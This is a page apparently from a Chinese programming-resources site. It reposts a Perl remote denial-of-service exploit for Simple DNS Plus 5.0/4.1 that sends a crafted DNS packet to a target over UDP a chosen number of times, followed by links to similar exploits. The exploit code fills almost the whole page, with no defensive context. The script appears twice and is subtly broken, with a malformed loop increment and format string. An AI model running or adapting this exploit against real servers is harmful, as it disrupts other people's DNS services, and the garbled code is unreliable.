您现在的位置是:网站首页> 编程资料编程资料
Simple DNS Plus _Exploit_网络安全_
2023-05-24
468人已围观
简介 Simple DNS Plus _Exploit_网络安全_
#!/usr/bin/perl
# Simple DNS Plus 5.0/4.1 < remote Denial of Service exploit
#
# usage: sdns-dos.pl
# Exploit written by Exodus.
# http://www.blackhat.org.il use IO::Socket; if(@ARGV < 3){
print("sdns-dos.pl");
}
$sock = IO::Socket::INET->new(PeerAddr => "$ARGV[0]:$ARGV[1]", Proto => 'UDP') || die("Cant connect DNS server"); $address = $ARGV[0]; $trans = pack("H4","1337");
$flags = pack("B16","1000010110110000");
$question = pack("H4","0001");
$answerRR = pack("H4","0001");
$authorityRR = pack("H4","0000");
$additionlRR = pack("H4","0000");
$type = pack("H4","0001"); # A host name
$class = pack("H4","0001"); # IN @parts = split(/\./,$address);
foreach $part (@parts)
{
$packedlen = pack("H2",sprintf("x",length($part)));
$address2 .= $packedlen.$part;
}
$query = $address2. "\000" . $type . $class; $aname = pack("H4","c00c");
$atype = pack("H4","0001");
$aclass = pack("H4","0001");
$ttl = pack("H8","0000008d");
$dlen = pack("H4","0004");
$addr = inet_aton("127.0.0.1");
$answer = $aname . $atype . $aclass . $ttl . $dlen . $addr; $payload = $trans . $flags . $question . $answerRR
. $authorityRR . $additionlRR . $query . $answer; print "sending $ARGV[2] packets… ";
for($i=0;$i<=$ARGV[2];$i )
{
print $sock $payload;
}
print "Done. Good bye.";
__END__
# Simple DNS Plus 5.0/4.1 < remote Denial of Service exploit
#
# usage: sdns-dos.pl
# Exploit written by Exodus.
# http://www.blackhat.org.il use IO::Socket; if(@ARGV < 3){
print("sdns-dos.pl
}
$sock = IO::Socket::INET->new(PeerAddr => "$ARGV[0]:$ARGV[1]", Proto => 'UDP') || die("Cant connect DNS server"); $address = $ARGV[0]; $trans = pack("H4","1337");
$flags = pack("B16","1000010110110000");
$question = pack("H4","0001");
$answerRR = pack("H4","0001");
$authorityRR = pack("H4","0000");
$additionlRR = pack("H4","0000");
$type = pack("H4","0001"); # A host name
$class = pack("H4","0001"); # IN @parts = split(/\./,$address);
foreach $part (@parts)
{
$packedlen = pack("H2",sprintf("x",length($part)));
$address2 .= $packedlen.$part;
}
$query = $address2. "\000" . $type . $class; $aname = pack("H4","c00c");
$atype = pack("H4","0001");
$aclass = pack("H4","0001");
$ttl = pack("H8","0000008d");
$dlen = pack("H4","0004");
$addr = inet_aton("127.0.0.1");
$answer = $aname . $atype . $aclass . $ttl . $dlen . $addr; $payload = $trans . $flags . $question . $answerRR
. $authorityRR . $additionlRR . $query . $answer; print "sending $ARGV[2] packets… ";
for($i=0;$i<=$ARGV[2];$i )
{
print $sock $payload;
}
print "Done. Good bye.";
__END__
相关内容
- Yahoo Messenger 8.1 ActiveX Remote Denial of Service Exploit _Exploit_网络安全_
- Document Imaging SDK 10.95 ActiveX Buffer Overflow PoC _Exploit_网络安全_
- WinRemotePC Full Lite 2008 r.2server Denial of Service Exploit _Exploit_网络安全_
- Bea Weblogic Apache Connector Code Exec / Denial of Service Exploit _Exploit_网络安全_
- WinRemotePC Full Lite 2008 r.2server Denial of Service Exploit _Exploit_网络安全_
- AlstraSoft Article Manager Pro 1.6 Blind SQL Injection Exploit _Exploit_网络安全_
- PPMate PPMedia Class ActiveX Control Buffer Overflow PoC _Exploit_网络安全_
- 终端技巧 终端机常见绕过沙盘方法_Exploit_网络安全_
- Bea Weblogic Apache Connector Code Exec / Denial of Service Exploit _Exploit_网络安全_
- File Store PRO 3.2 Multiple Blind SQL Injection Vulnerabilities _Exploit_网络安全_
